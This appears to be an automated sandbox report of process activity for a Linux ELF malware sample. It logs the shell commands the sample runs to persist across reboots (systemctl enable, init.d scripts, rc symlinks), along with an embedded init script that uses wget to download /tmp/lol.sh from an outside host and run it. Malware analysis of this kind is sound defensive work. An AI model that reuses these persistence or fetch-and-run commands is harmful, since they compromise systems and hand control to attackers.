                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:/bin/sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:-
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/bin/systemctl
                                                                                                Arguments:systemctl enable custom.service
                                                                                                File size:996584 bytes
                                                                                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:/bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:-
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/bin/chmod
                                                                                                Arguments:chmod +x /etc/init.d/mybinary
                                                                                                File size:63864 bytes
                                                                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:/bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:-
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/bin/ln
                                                                                                Arguments:ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
                                                                                                File size:76160 bytes
                                                                                                MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:/bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/tVdq8lEt3e.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting tVdq8lEt3e.elf'\n /tmp/tVdq8lEt3e.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping tVdq8lEt3e.elf'\n killall tVdq8lEt3e.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/tVdq8lEt3e.elf"
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:/bin/sh -c "chmod +x /etc/init.d/tVdq8lEt3e.elf >/dev/null 2>&1"
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:-
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/bin/chmod
                                                                                                Arguments:chmod +x /etc/init.d/tVdq8lEt3e.elf
                                                                                                File size:63864 bytes
                                                                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:/bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:-
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/bin/mkdir
                                                                                                Arguments:mkdir -p /etc/rc.d
                                                                                                File size:88408 bytes
                                                                                                MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:/bin/sh -c "ln -s /etc/init.d/tVdq8lEt3e.elf /etc/rc.d/S99tVdq8lEt3e.elf >/dev/null 2>&1"
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:-
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/bin/ln
                                                                                                Arguments:ln -s /etc/init.d/tVdq8lEt3e.elf /etc/rc.d/S99tVdq8lEt3e.elf
                                                                                                File size:76160 bytes
                                                                                                MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/tmp/tVdq8lEt3e.elf
                                                                                                Arguments:-
                                                                                                File size:4956856 bytes
                                                                                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/lib/systemd/systemd
                                                                                                Arguments:-
                                                                                                File size:1620224 bytes
                                                                                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:45
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                File size:22760 bytes
                                                                                                MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/libexec/gnome-session-binary
                                                                                                Arguments:-
                                                                                                File size:334664 bytes
                                                                                                MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:46
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/bin/sh
                                                                                                Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                                                                                File size:129816 bytes
                                                                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                Chronological Activities


                                                                                                General

                                                                                                Start time (UTC):22:36:47
                                                                                                Start date (UTC):11/09/2024
                                                                                                Path:/usr/libexec/gsd-housekeeping
                                                                                                Arguments:/usr/libexec/gsd-housekeeping
                                                                                                File size:51840 bytes
                                                                                                MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                                                                                Chronological Activities